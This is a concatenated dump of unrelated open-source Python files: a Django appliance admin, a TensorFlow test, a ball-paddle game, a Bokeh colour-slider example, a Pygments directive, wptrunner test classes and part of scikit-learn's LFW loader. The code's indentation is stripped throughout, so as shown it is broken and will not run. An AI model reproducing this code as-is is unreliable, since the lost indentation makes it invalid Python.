for appliance in appliances:
tasks.appliance_suspend.delay(appliance.id)
self.message_user(request, "Initiated suspend of {}.".format(appliance.name))
self.logger.info(
"User {}/{} requested suspend of appliance {}".format(
request.user.pk, request.user.username, appliance.id))
@action("Kill", "Kill selected appliance")
def kill(self, request, appliances):
for appliance in appliances:
Appliance.kill(appliance)
self.message_user(request, "Initiated kill of {}.".format(appliance.name))
self.logger.info(
"User {}/{} requested kill of appliance {}".format(
request.user.pk, request.user.username, appliance.id))
def owner(self, instance):
if instance.owner is not None:
return instance.owner.username
else:
return "--- no owner ---"
def show_ip_address(self, instance):
if instance.ip_address:
return "<a href=\"https://{ip}/\" target=\"_blank\">{ip}</a>".format(
ip=instance.ip_address)
else:
return "---"
show_ip_address.allow_tags = True
show_ip_address.short_description = "IP address"
@register_for(AppliancePool)
class AppliancePoolAdmin(Admin):
objectactions = ["kill"]
actions = objectactions
list_display = [
"id", "group", "version", "date", "owner", "fulfilled", "appliances_ready",
"queued_provision_tasks", "percent_finished", "total_count", "current_count"]
readonly_fields = [
"fulfilled", "appliances_ready", "queued_provision_tasks", "percent_finished",
"current_count"]
@action("Kill", "Kill the appliance pool")
def kill(self, request, pools):
for pool in pools:
pool.kill()
self.message_user(request, "Initiated kill of appliance pool {}".format(pool.id))
self.logger.info(
"User {}/{} requested kill of pool {}".format(
request.user.pk, request.user.username, pool.id))
def fulfilled(self, instance):
return instance.fulfilled
fulfilled.boolean = True
def appliances_ready(self, instance):
return len(instance.appliance_ips)
def queued_provision_tasks(self, instance):
return len(instance.queued_provision_tasks)
def percent_finished(self, instance):
return "{0:.2f}%".format(round(instance.percent_finished * 100.0, 2))
def current_count(self, instance):
return instance.current_count
@register_for(Group)
class GroupAdmin(Admin):
pass
@register_for(Provider)
class ProviderAdmin(Admin):
readonly_fields = [
"remaining_provisioning_slots", "provisioning_load", "show_ip_address", "appliance_load"]
list_display = [
"id", "working", "num_simultaneous_provisioning", "remaining_provisioning_slots",
"provisioning_load", "show_ip_address", "appliance_load"]
def remaining_provisioning_slots(self, instance):
return str(instance.remaining_provisioning_slots)
def appliance_load(self, instance):
return "{0:.2f}%".format(round(instance.appliance_load * 100.0, 2))
def provisioning_load(self, instance):
return "{0:.2f}%".format(round(instance.provisioning_load * 100.0, 2))
def show_ip_address(self, instance):
if instance.ip_address:
return "<a href=\"https://{ip}/\" target=\"_blank\">{ip}</a>".format(
ip=instance.ip_address)
else:
return "---"
show_ip_address.allow_tags = True
show_ip_address.short_description = "IP address"
@register_for(Template)
class TemplateAdmin(Admin):
list_display = [
"name", "version", "original_name", "ready", "exists", "date", "template_group", "usable"]
@register_for(MismatchVersionMailer)
class MismatchVersionMailerAdmin(Admin):
list_display = ["provider", "template_name", "supposed_version", "actual_version", "sent"]
class UserApplianceQuotaInline(admin.StackedInline):
model = UserApplianceQuota
can_delete = False
@register_for(User, reregister=True)
class CustomUserAdmin(UserAdmin):
inlines = (UserApplianceQuotaInline, )
@register_for(BugQuery)
class BugQueryAdmin(Admin):
pass
| gpl-2.0 |
ageron/tensorflow | tensorflow/python/kernel_tests/control_flow_util_v2_test.py | 36 | 2273 | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.python.ops.control_flow_util_v2."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.eager import function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import test_util
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import control_flow_util_v2
from tensorflow.python.platform import test
class ControlFlowUtilV2Test(test.TestCase):
def setUp(self):
self._enable_control_flow_v2_old = control_flow_util.ENABLE_CONTROL_FLOW_V2
control_flow_util.ENABLE_CONTROL_FLOW_V2 = True
def tearDown(self):
control_flow_util.ENABLE_CONTROL_FLOW_V2 = self._enable_control_flow_v2_old
def _create_control_flow(self, expect_in_defun):
"""Helper method for testInDefun."""
def body(i):
def branch():
self.assertEqual(control_flow_util_v2.in_defun(), expect_in_defun)
return i + 1
return control_flow_ops.cond(constant_op.constant(True),
branch, lambda: 0)
return control_flow_ops.while_loop(lambda i: i < 4, body,
[constant_op.constant(0)])
@test_util.run_in_graph_and_eager_modes
def testInDefun(self):
self._create_control_flow(False)
@function.defun
def defun():
self._create_control_flow(True)
defun()
self.assertFalse(control_flow_util_v2.in_defun())
if __name__ == "__main__":
test.main()
| apache-2.0 |
brianquinlan/learn-machine-learning | well_bouncer/well_bouncer_game.py | 1 | 5000 | # Copyright 2019 Brian Quinlan
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The game model for a game where a ball has to be kept in the air.
The same is similar to breakout except that there are no blocks to break at
the top of the screen i.e. the objective is simply to keep the ball in the air
using a paddle as long as possible.
"""
import abc
import enum
import random
from typing import Mapping, Optional
import numpy as np
def _normalize(v):
norm = np.linalg.norm(v)
if norm == 0:
return v
return v / norm
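The paddle bounce below uses the standard reflection formula v' = v - 2(v·n)n for a unit normal n; a quick standalone check with plain tuples (illustrative only; the game itself uses numpy arrays):

```python
def reflect(v, n):
    """Reflect 2D velocity v off a surface with unit normal n."""
    d = v[0] * n[0] + v[1] * n[1]          # v · n
    return (v[0] - 2 * d * n[0], v[1] - 2 * d * n[1])

# A ball falling onto a horizontal surface bounces straight back up.
print(reflect((1.0, -1.0), (0.0, 1.0)))  # → (1.0, 1.0)
```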
class Direction(enum.IntEnum):
"""The possible player moves."""
LEFT = 0
CENTER = 1
RIGHT = 2
class MoveMaker(abc.ABC):
@abc.abstractmethod
def make_move(self, state) -> Direction:
pass
def move_probabilities(self, state) -> Optional[Mapping[Direction, float]]:
return None
class Game:
NUM_STATES = 6
NUM_ACTIONS = 3
def __init__(self,
reward_time_multiplier=1.0,
reward_bounces_multiplier=0.0,
reward_height_multiplier=0.0,
punish_moves_multiplier=1.0):
self._ball_pos = np.array([3 + random.random() * 19, 100.0])
self._ball_v = np.array([-0.3 + random.random() * 0.6, 0.0])
self.ball_radius = 1
self._g = np.array([0.0, -0.025])
self._paddle_pos = np.array([12.5, -9.5])
self.paddle_radius = 10
self._done = False
self._score = 0
self._reward_time_multiplier = reward_time_multiplier
self._reward_bounces_multiplier = reward_bounces_multiplier
self._reward_height_multiplier = reward_height_multiplier
self._punish_moves_multiplier = punish_moves_multiplier
@property
def done(self):
return self._done
@property
def ball_x(self):
return self._ball_pos[0]
@property
def ball_y(self):
return self._ball_pos[1]
@property
def paddle_x(self):
return self._paddle_pos[0]
@property
def paddle_y(self):
return self._paddle_pos[1]
@property
def state(self):
return (
self._ball_pos[0],
self._ball_pos[1],
self._ball_v[0],
self._ball_v[1],
self._paddle_pos[0],
self._paddle_pos[1],
)
@property
def score(self):
return self._score
def _update(self):
assert not self._done
self._score += self._reward_time_multiplier
old_y = self.ball_y
self._ball_v += self._g
self._ball_pos += self._ball_v
distance = np.linalg.norm(
[self.paddle_x - self.ball_x, self.paddle_y - self.ball_y])
if distance < (self.paddle_radius + self.ball_radius):
self._score += self._reward_bounces_multiplier
n = _normalize(
[self.paddle_x - self.ball_x, self.paddle_y - self.ball_y])
self._ball_v = self._ball_v - 2 * (np.dot(self._ball_v, n)) * n
self._ball_pos += self._ball_v
if self.ball_y < self.ball_radius:
self._done = True
elif self.ball_x < self.ball_radius:
self._score += self._reward_bounces_multiplier
self._ball_v *= [-1, 1]
self._ball_pos += [self._ball_v[0], 0]
elif self.ball_x > (25 - self.ball_radius):
self._score += self._reward_bounces_multiplier
self._ball_v *= [-1, 1]
self._ball_pos += [self._ball_v[0], 0]
if self.ball_y > old_y:
self._score += (self.ball_y -
old_y) * self._reward_height_multiplier
return self.state
def move_left(self):
self._score -= self._punish_moves_multiplier
self._paddle_pos += [-2, 0]
if self._paddle_pos[0] < 0:
self._paddle_pos[0] = 0
return self._update()
def move_right(self):
self._score -= self._punish_moves_multiplier
self._paddle_pos += [2, 0]
if self._paddle_pos[0] > 25:
self._paddle_pos[0] = 25
return self._update()
def stay(self):
return self._update()
def move(self, direction: Direction):
if direction == Direction.LEFT:
self.move_left()
elif direction == Direction.CENTER:
self.stay()
elif direction == Direction.RIGHT:
self.move_right()
else:
assert False, "unexpected direction: %r" % (direction,)
| mit |
timothydmorton/bokeh | examples/plotting/file/color_sliders.py | 24 | 5444 | from bokeh.plotting import figure, hplot, output_file, show
from bokeh.models import ColumnDataSource, LinearColorMapper, HoverTool
from bokeh.models.actions import Callback
from bokeh.models.widgets import Slider
from bokeh.io import vform
import colorsys
# for plot 2: create colour spectrum of resolution N and brightness I, return as list of decimal RGB value tuples
def generate_color_range(N, I):
HSV_tuples = [ (x*1.0/N, 0.5, I) for x in range(N) ]
RGB_tuples = map(lambda x: colorsys.hsv_to_rgb(*x), HSV_tuples)
for_conversion = []
for RGB_tuple in RGB_tuples:
for_conversion.append((int(RGB_tuple[0]*255), int(RGB_tuple[1]*255), int(RGB_tuple[2]*255)))
hex_colors = [ rgb_to_hex(RGB_tuple) for RGB_tuple in for_conversion ]
return hex_colors, for_conversion
# convert RGB tuple to hexadecimal code
def rgb_to_hex(rgb):
return '#%02x%02x%02x' % rgb
# convert hexadecimal to RGB tuple
def hex_to_dec(hex):
red = ''.join(hex.strip('#')[0:2])
green = ''.join(hex.strip('#')[2:4])
blue = ''.join(hex.strip('#')[4:6])
return (int(red, 16), int(green, 16), int(blue,16))
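The two converters above are inverses; a quick round-trip sketch (standalone copies of the helpers, with the builtin-shadowing `hex` argument renamed):

```python
def rgb_to_hex(rgb):
    return '#%02x%02x%02x' % rgb

def hex_to_dec(hex_code):
    s = hex_code.strip('#')
    return (int(s[0:2], 16), int(s[2:4], 16), int(s[4:6], 16))

print(hex_to_dec(rgb_to_hex((255, 128, 0))))  # → (255, 128, 0)
```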
# plot 1: create a color block with RGB values adjusted with sliders
# initialise a white block for the first plot
x = [0]
y = [0]
red = 255
green = 255
blue = 255
hex_color = rgb_to_hex((red,green,blue))
# initialise the text color as black. This will be switched to white if the block color gets dark enough
text_color = '#000000'
# create a data source to enable refreshing of fill & text color
source = ColumnDataSource(data=dict(x = x, y = y, color = [hex_color], text_color = [text_color]))
tools1 = 'reset, save'
# create first plot, as a rect() glyph and centered text label, with fill and text color taken from source
p1 = figure(x_range=(-8, 8), y_range=(-4, 4), plot_width=600, plot_height=300, title=None, tools=tools1)
color_block = p1.rect(x='x', y='y', width=18, height=10, fill_color='color', line_color = 'black', source=source)
hex_code_text = p1.text('x', 'y', text='color', text_color='text_color', alpha=0.6667, text_font_size='36pt', text_baseline='middle', text_align='center', source=source)
# the callback function to update the color of the block and associated label text
# NOTE: the JS functions for converting RGB to hex are taken from the excellent answer
# by Tim Down at http://stackoverflow.com/questions/5623838/rgb-to-hex-and-hex-to-rgb
callback = Callback(args=dict(source=source), code="""
function componentToHex(c) {
var hex = c.toString(16);
return hex.length == 1 ? "0" + hex : hex;
}
function rgbToHex(r, g, b) {
return "#" + componentToHex(r) + componentToHex(g) + componentToHex(b);
}
var data = source.get('data');
var RS = red_slider;
var GS = green_slider;
var BS = blue_slider;
color = data['color'];
var red_from_slider = RS.get('value');
var green_from_slider = GS.get('value');
var blue_from_slider = BS.get('value');
text_color = data['text_color'];
color[0] = rgbToHex(red_from_slider, green_from_slider, blue_from_slider);
if ((red_from_slider > 127) || (green_from_slider > 127) || (blue_from_slider > 127)) {
text_color[0] = '#000000';
}
else {
text_color[0] = '#ffffff';
}
source.trigger('change');
""")
# create slider tool objects to control the RGB levels for first plot. Set callback function to allow refresh
red_slider = Slider(start=0, end=255, value=255, step=1, title="R", callback=callback)
green_slider = Slider(start=0, end=255, value=255, step=1, title="G", callback=callback)
blue_slider = Slider(start=0, end=255, value=255, step=1, title="B", callback=callback)
callback.args['red_slider'] = red_slider
callback.args['green_slider'] = green_slider
callback.args['blue_slider'] = blue_slider
# plot 2: create a color spectrum with a hover-over tool to inspect hex codes
brightness = 0.8 # at the moment this is hard-coded. Change if you want brighter/darker colors
crx = list(range(1,1001)) # the resolution is 1000 colors
cry = [ 5 for i in range(len(crx)) ]
crcolor, crRGBs = generate_color_range(1000,brightness) # produce spectrum
# make data source object to allow information to be displayed by hover tool
crsource = ColumnDataSource(data=dict(x = crx, y = cry, crcolor = crcolor, RGBs = crRGBs))
tools2 = 'reset, save, hover'
# create second plot
p2 = figure(x_range=(0,1000), y_range=(0,10), plot_width=600, plot_height=150, tools=tools2, title = 'hover over color')
color_range1 = p2.rect(x='x', y='y', width=1, height=10, color='crcolor', source=crsource)
# set up hover tool to show color hex code and sample swatch
hover = p2.select(dict(type=HoverTool))
hover.tooltips = [
('color', '$color[hex, rgb, swatch]:crcolor'),
('RGB levels', '@RGBs')
]
# get rid of axis details for cleaner look
p1.ygrid.grid_line_color = None
p1.xgrid.grid_line_color = None
p1.axis.axis_line_color = None
p1.axis.major_label_text_color = None
p1.axis.major_tick_line_color = None
p1.axis.minor_tick_line_color = None
p2.ygrid.grid_line_color = None
p2.xgrid.grid_line_color = None
p2.axis.axis_line_color = None
p2.axis.major_label_text_color = None
p2.axis.major_tick_line_color = None
p2.axis.minor_tick_line_color = None
layout = hplot(
vform(red_slider, green_slider, blue_slider),
vform(p1, p2)
)
output_file("color_sliders.html")
show(layout)
| bsd-3-clause |
xiangel/hue | desktop/core/ext-py/Pygments-1.3.1/external/rst-directive.py | 47 | 2597 | # -*- coding: utf-8 -*-
"""
The Pygments reStructuredText directive
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This fragment is a Docutils_ 0.5 directive that renders source code
(to HTML only, currently) via Pygments.
To use it, adjust the options below and copy the code into a module
that you import on initialization. The code then automatically
registers a ``sourcecode`` directive that you can use instead of
normal code blocks like this::
.. sourcecode:: python
My code goes here.
If you want to have different code styles, e.g. one with line numbers
and one without, add formatters with their names in the VARIANTS dict
below. You can invoke them instead of the DEFAULT one by using a
directive option::
.. sourcecode:: python
:linenos:
My code goes here.
Look at the `directive documentation`_ to get all the gory details.
.. _Docutils: http://docutils.sf.net/
.. _directive documentation:
http://docutils.sourceforge.net/docs/howto/rst-directives.html
:copyright: Copyright 2006-2010 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
# Options
# ~~~~~~~
# Set to True if you want inline CSS styles instead of classes
INLINESTYLES = False
from pygments.formatters import HtmlFormatter
# The default formatter
DEFAULT = HtmlFormatter(noclasses=INLINESTYLES)
# Add name -> formatter pairs for every variant you want to use
VARIANTS = {
# 'linenos': HtmlFormatter(noclasses=INLINESTYLES, linenos=True),
}
from docutils import nodes
from docutils.parsers.rst import directives, Directive
from pygments import highlight
from pygments.lexers import get_lexer_by_name, TextLexer
class Pygments(Directive):
""" Source code syntax hightlighting.
"""
required_arguments = 1
optional_arguments = 0
final_argument_whitespace = True
option_spec = dict([(key, directives.flag) for key in VARIANTS])
has_content = True
def run(self):
self.assert_has_content()
try:
lexer = get_lexer_by_name(self.arguments[0])
except ValueError:
# no lexer found - use the text one instead of an exception
lexer = TextLexer()
# take an arbitrary option if more than one is given
formatter = self.options and VARIANTS[self.options.keys()[0]] or DEFAULT
parsed = highlight(u'\n'.join(self.content), lexer, formatter)
return [nodes.raw('', parsed, format='html')]
directives.register_directive('sourcecode', Pygments)
| apache-2.0 |
Tranzystorek/servo | tests/wpt/harness/wptrunner/wpttest.py | 58 | 10090 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
DEFAULT_TIMEOUT = 10 # seconds
LONG_TIMEOUT = 60 # seconds
import os
import mozinfo
from wptmanifest.parser import atoms
atom_reset = atoms["Reset"]
enabled_tests = set(["testharness", "reftest", "wdspec"])
class Result(object):
def __init__(self, status, message, expected=None, extra=None):
if status not in self.statuses:
raise ValueError("Unrecognised status %s" % status)
self.status = status
self.message = message
self.expected = expected
self.extra = extra
def __repr__(self):
return "<%s.%s %s>" % (self.__module__, self.__class__.__name__, self.status)
class SubtestResult(object):
def __init__(self, name, status, message, stack=None, expected=None):
self.name = name
if status not in self.statuses:
raise ValueError("Unrecognised status %s" % status)
self.status = status
self.message = message
self.stack = stack
self.expected = expected
def __repr__(self):
return "<%s.%s %s %s>" % (self.__module__, self.__class__.__name__, self.name, self.status)
class TestharnessResult(Result):
default_expected = "OK"
statuses = set(["OK", "ERROR", "TIMEOUT", "EXTERNAL-TIMEOUT", "CRASH"])
class TestharnessSubtestResult(SubtestResult):
default_expected = "PASS"
statuses = set(["PASS", "FAIL", "TIMEOUT", "NOTRUN"])
class ReftestResult(Result):
default_expected = "PASS"
statuses = set(["PASS", "FAIL", "ERROR", "TIMEOUT", "EXTERNAL-TIMEOUT", "CRASH"])
class WdspecResult(Result):
default_expected = "OK"
statuses = set(["OK", "ERROR", "TIMEOUT", "EXTERNAL-TIMEOUT", "CRASH"])
class WdspecSubtestResult(SubtestResult):
default_expected = "PASS"
statuses = set(["PASS", "FAIL", "ERROR"])
def get_run_info(metadata_root, product, **kwargs):
return RunInfo(metadata_root, product, **kwargs)
class RunInfo(dict):
def __init__(self, metadata_root, product, debug, extras=None):
self._update_mozinfo(metadata_root)
self.update(mozinfo.info)
self["product"] = product
if debug is not None:
self["debug"] = debug
elif "debug" not in self:
# Default to release
self["debug"] = False
if extras is not None:
self.update(extras)
def _update_mozinfo(self, metadata_root):
"""Add extra build information from a mozinfo.json file in a parent
directory"""
path = metadata_root
dirs = set()
while path != os.path.expanduser('~'):
if path in dirs:
break
dirs.add(str(path))
path = os.path.split(path)[0]
mozinfo.find_and_update_from_json(*dirs)
class Test(object):
result_cls = None
subtest_result_cls = None
test_type = None
def __init__(self, url, inherit_metadata, test_metadata, timeout=DEFAULT_TIMEOUT, path=None,
protocol="http"):
self.url = url
self._inherit_metadata = inherit_metadata
self._test_metadata = test_metadata
self.timeout = timeout
self.path = path
self.environment = {"protocol": protocol, "prefs": self.prefs}
def __eq__(self, other):
return self.id == other.id
@classmethod
def from_manifest(cls, manifest_item, inherit_metadata, test_metadata):
timeout = LONG_TIMEOUT if manifest_item.timeout == "long" else DEFAULT_TIMEOUT
return cls(manifest_item.url,
inherit_metadata,
test_metadata,
timeout=timeout,
path=manifest_item.source_file.path,
protocol="https" if hasattr(manifest_item, "https") and manifest_item.https else "http")
@property
def id(self):
return self.url
@property
def keys(self):
return tuple()
def _get_metadata(self, subtest=None):
if self._test_metadata is not None and subtest is not None:
return self._test_metadata.get_subtest(subtest)
else:
return self._test_metadata
def itermeta(self, subtest=None):
for metadata in self._inherit_metadata:
yield metadata
if self._test_metadata is not None:
yield self._get_metadata()
if subtest is not None:
subtest_meta = self._get_metadata(subtest)
if subtest_meta is not None:
yield subtest_meta
def disabled(self, subtest=None):
for meta in self.itermeta(subtest):
disabled = meta.disabled
if disabled is not None:
return disabled
return None
@property
def restart_after(self):
for meta in self.itermeta(None):
restart_after = meta.restart_after
if restart_after is not None:
return True
return False
@property
def tags(self):
tags = set()
for meta in self.itermeta():
meta_tags = meta.tags
if atom_reset in meta_tags:
tags = meta_tags.copy()
tags.remove(atom_reset)
else:
tags |= meta_tags
tags.add("dir:%s" % self.id.lstrip("/").split("/")[0])
return tags
@property
def prefs(self):
prefs = {}
for meta in self.itermeta():
meta_prefs = meta.prefs
if atom_reset in prefs:
prefs = meta_prefs.copy()
del prefs[atom_reset]
else:
prefs.update(meta_prefs)
return prefs
def expected(self, subtest=None):
if subtest is None:
default = self.result_cls.default_expected
else:
default = self.subtest_result_cls.default_expected
metadata = self._get_metadata(subtest)
if metadata is None:
return default
try:
return metadata.get("expected")
except KeyError:
return default
def __repr__(self):
return "<%s.%s %s>" % (self.__module__, self.__class__.__name__, self.id)
class TestharnessTest(Test):
result_cls = TestharnessResult
subtest_result_cls = TestharnessSubtestResult
test_type = "testharness"
@property
def id(self):
return self.url
class ManualTest(Test):
test_type = "manual"
@property
def id(self):
return self.url
class ReftestTest(Test):
result_cls = ReftestResult
test_type = "reftest"
def __init__(self, url, inherit_metadata, test_metadata, references,
timeout=DEFAULT_TIMEOUT, path=None, viewport_size=None,
dpi=None, protocol="http"):
Test.__init__(self, url, inherit_metadata, test_metadata, timeout, path, protocol)
for _, ref_type in references:
if ref_type not in ("==", "!="):
raise ValueError
self.references = references
self.viewport_size = viewport_size
self.dpi = dpi
@classmethod
def from_manifest(cls,
manifest_test,
inherit_metadata,
test_metadata,
nodes=None,
references_seen=None):
timeout = LONG_TIMEOUT if manifest_test.timeout == "long" else DEFAULT_TIMEOUT
if nodes is None:
nodes = {}
if references_seen is None:
references_seen = set()
url = manifest_test.url
node = cls(manifest_test.url,
inherit_metadata,
test_metadata,
[],
timeout=timeout,
path=manifest_test.path,
viewport_size=manifest_test.viewport_size,
dpi=manifest_test.dpi,
protocol="https" if hasattr(manifest_test, "https") and manifest_test.https else "http")
nodes[url] = node
for ref_url, ref_type in manifest_test.references:
comparison_key = (ref_type,) + tuple(sorted([url, ref_url]))
if ref_url in nodes:
manifest_node = ref_url
if comparison_key in references_seen:
# We have reached a cycle so stop here
# Note that just seeing a node for the second time is not
# enough to detect a cycle because
# A != B != C != A must include C != A
# but A == B == A should not include the redundant B == A.
continue
references_seen.add(comparison_key)
manifest_node = manifest_test.manifest.get_reference(ref_url)
if manifest_node:
reference = ReftestTest.from_manifest(manifest_node,
[],
None,
nodes,
references_seen)
else:
reference = ReftestTest(ref_url, [], None, [])
node.references.append((reference, ref_type))
return node
@property
def id(self):
return self.url
@property
def keys(self):
return ("reftype", "refurl")
class WdspecTest(Test):
result_cls = WdspecResult
subtest_result_cls = WdspecSubtestResult
test_type = "wdspec"
manifest_test_cls = {"reftest": ReftestTest,
"testharness": TestharnessTest,
"manual": ManualTest,
"wdspec": WdspecTest}
def from_manifest(manifest_test, inherit_metadata, test_metadata):
test_cls = manifest_test_cls[manifest_test.item_type]
return test_cls.from_manifest(manifest_test, inherit_metadata, test_metadata)
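The comparison-key trick in ReftestTest.from_manifest can be shown in isolation: a key is the relation type plus the sorted URL pair, so A == B and B == A collapse to one key, while a chain such as A != B != C != A is followed until the closing comparison repeats. A sketch with hypothetical URLs (not the real manifest API):

```python
def walk(url, refs, seen=None):
    # refs maps url -> list of (ref_url, ref_type); returns the comparison keys visited
    if seen is None:
        seen = set()
    for ref_url, ref_type in refs.get(url, []):
        key = (ref_type,) + tuple(sorted([url, ref_url]))
        if key in seen:
            continue  # cycle closed - stop here, as in from_manifest
        seen.add(key)
        walk(ref_url, refs, seen)
    return seen

refs = {'a': [('b', '!=')], 'b': [('c', '!=')], 'c': [('a', '!=')]}
keys = walk('a', refs)
# all three inequality comparisons are recorded exactly once
assert len(keys) == 3
```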
| mpl-2.0 |
cdegroc/scikit-learn | sklearn/datasets/lfw.py | 6 | 16362 | """Loader for the Labeled Faces in the Wild (LFW) dataset
This dataset is a collection of JPEG pictures of famous people collected
over the internet, all details are available on the official website:
http://vis-www.cs.umass.edu/lfw/
Each picture is centered on a single face. The typical task is called
Face Verification: given a pair of two pictures, a binary classifier
must predict whether the two images are from the same person.
An alternative task, Face Recognition or Face Identification is:
given the picture of the face of an unknown person, identify the name
of the person by referring to a gallery of previously seen pictures of
identified persons.
Both Face Verification and Face Recognition are tasks that are typically
performed on the output of a model trained to perform Face Detection. The
most popular model for Face Detection is called Viola-Jones and is
implemented in the OpenCV library. The LFW faces were extracted by this face
detector from various online websites.
"""
# Copyright (c) 2011 Olivier Grisel <olivier.grisel@ensta.org>
# License: Simplified BSD
from os import listdir, makedirs, remove
from os.path import join, exists, isdir
import logging
import numpy as np
import urllib
from .base import get_data_home, Bunch
from ..externals.joblib import Memory
logger = logging.getLogger(__name__)
BASE_URL = "http://vis-www.cs.umass.edu/lfw/"
ARCHIVE_NAME = "lfw.tgz"
FUNNELED_ARCHIVE_NAME = "lfw-funneled.tgz"
TARGET_FILENAMES = [
'pairsDevTrain.txt',
'pairsDevTest.txt',
'pairs.txt',
]
def scale_face(face):
"""Scale back to 0-1 range in case of normalization for plotting"""
scaled = face - face.min()
scaled /= scaled.max()
return scaled
#
# Common private utilities for data fetching from the original LFW website
# local disk caching, and image decoding.
#
def check_fetch_lfw(data_home=None, funneled=True, download_if_missing=True):
"""Helper function to download any missing LFW data"""
data_home = get_data_home(data_home=data_home)
lfw_home = join(data_home, "lfw_home")
if funneled:
archive_path = join(lfw_home, FUNNELED_ARCHIVE_NAME)
data_folder_path = join(lfw_home, "lfw_funneled")
archive_url = BASE_URL + FUNNELED_ARCHIVE_NAME
else:
archive_path = join(lfw_home, ARCHIVE_NAME)
data_folder_path = join(lfw_home, "lfw")
archive_url = BASE_URL + ARCHIVE_NAME
if not exists(lfw_home):
makedirs(lfw_home)
for target_filename in TARGET_FILENAMES:
target_filepath = join(lfw_home, target_filename)
if not exists(target_filepath):
if download_if_missing:
url = BASE_URL + target_filename
logger.warn("Downloading LFW metadata: %s", url)
urllib.urlretrieve(url, target_filepath)
else:
raise IOError("%s is missing" % target_filepath)
if not exists(data_folder_path):
if not exists(archive_path):
if download_if_missing:
logger.warn("Downloading LFW data (~200MB): %s", archive_url)
urllib.urlretrieve(archive_url, archive_path)
else:
raise IOError("%s is missing" % target_filepath)
import tarfile
logger.info("Decompressing the data archive to %s", data_folder_path)
tarfile.open(archive_path, "r:gz").extractall(path=lfw_home)
remove(archive_path)
return lfw_home, data_folder_path
def _load_imgs(file_paths, slice_, color, resize):
"""Internally used to load images"""
# Try to import imread and imresize from PIL. We do this here to prevent
# the whole sklearn.datasets module from depending on PIL.
try:
try:
from scipy.misc import imread
except ImportError:
from scipy.misc.pilutil import imread
from scipy.misc import imresize
except ImportError:
raise ImportError("The Python Imaging Library (PIL) "
"is required to load data from jpeg files")
# compute the portion of the images to load to respect the slice_ parameter
# given by the caller
default_slice = (slice(0, 250), slice(0, 250))
if slice_ is None:
slice_ = default_slice
else:
slice_ = tuple(s or ds for s, ds in zip(slice_, default_slice))
h_slice, w_slice = slice_
h = (h_slice.stop - h_slice.start) / (h_slice.step or 1)
w = (w_slice.stop - w_slice.start) / (w_slice.step or 1)
if resize is not None:
resize = float(resize)
h = int(resize * h)
w = int(resize * w)
# allocate some contiguous memory to host the decoded image slices
n_faces = len(file_paths)
if not color:
faces = np.zeros((n_faces, h, w), dtype=np.float32)
else:
faces = np.zeros((n_faces, h, w, 3), dtype=np.float32)
# iterate over the collected file path to load the jpeg files as numpy
# arrays
for i, file_path in enumerate(file_paths):
if i % 1000 == 0:
logger.info("Loading face #%05d / %05d", i + 1, n_faces)
face = np.asarray(imread(file_path)[slice_], dtype=np.float32)
face /= 255.0 # scale uint8 coded colors to the [0.0, 1.0] floats
if resize is not None:
face = imresize(face, resize)
if not color:
# average the color channels to compute a gray levels
# representation
face = face.mean(axis=2)
faces[i, ...] = face
return faces
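The height/width bookkeeping in _load_imgs is easy to get wrong; the same computation as a standalone sketch, using the default 250x250 LFW frame and the slice/resize values that fetch_lfw_people passes by default:

```python
def target_shape(slice_=None, resize=None):
    # mirror the slice normalisation and resize arithmetic from _load_imgs
    default_slice = (slice(0, 250), slice(0, 250))
    if slice_ is None:
        slice_ = default_slice
    else:
        slice_ = tuple(s or ds for s, ds in zip(slice_, default_slice))
    h_slice, w_slice = slice_
    h = (h_slice.stop - h_slice.start) // (h_slice.step or 1)
    w = (w_slice.stop - w_slice.start) // (w_slice.step or 1)
    if resize is not None:
        h, w = int(resize * h), int(resize * w)
    return h, w

assert target_shape() == (250, 250)
# the default fetch_lfw_people slice plus resize=0.5 yields 62x47 images
assert target_shape((slice(70, 195), slice(78, 172)), 0.5) == (62, 47)
```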
#
# Task #1: Face Identification on picture with names
#
def _fetch_lfw_people(data_folder_path, slice_=None, color=False, resize=None,
min_faces_per_person=0):
"""Perform the actual data loading for the lfw people dataset
This operation is meant to be cached by a joblib wrapper.
"""
# scan the data folder content to retain people with more than
# `min_faces_per_person` face pictures
person_names, file_paths = [], []
for person_name in sorted(listdir(data_folder_path)):
folder_path = join(data_folder_path, person_name)
if not isdir(folder_path):
continue
paths = [join(folder_path, f) for f in listdir(folder_path)]
n_pictures = len(paths)
if n_pictures >= min_faces_per_person:
person_name = person_name.replace('_', ' ')
person_names.extend([person_name] * n_pictures)
file_paths.extend(paths)
n_faces = len(file_paths)
if n_faces == 0:
raise ValueError("min_faces_per_person=%d is too restrictive" %
min_faces_per_person)
target_names = np.unique(person_names)
target = np.searchsorted(target_names, person_names)
faces = _load_imgs(file_paths, slice_, color, resize)
# shuffle the faces with a deterministic RNG scheme to avoid having
# all faces of the same person in a row, as it would break some
# cross validation and learning algorithms such as SGD and online
# k-means that make an IID assumption
indices = np.arange(n_faces)
np.random.RandomState(42).shuffle(indices)
faces, target = faces[indices], target[indices]
return faces, target, target_names
def fetch_lfw_people(data_home=None, funneled=True, resize=0.5,
min_faces_per_person=None, color=False,
slice_=(slice(70, 195), slice(78, 172)),
download_if_missing=True):
"""Loader for the Labeled Faces in the Wild (LFW) people dataset
This dataset is a collection of JPEG pictures of famous people
collected on the internet, all details are available on the
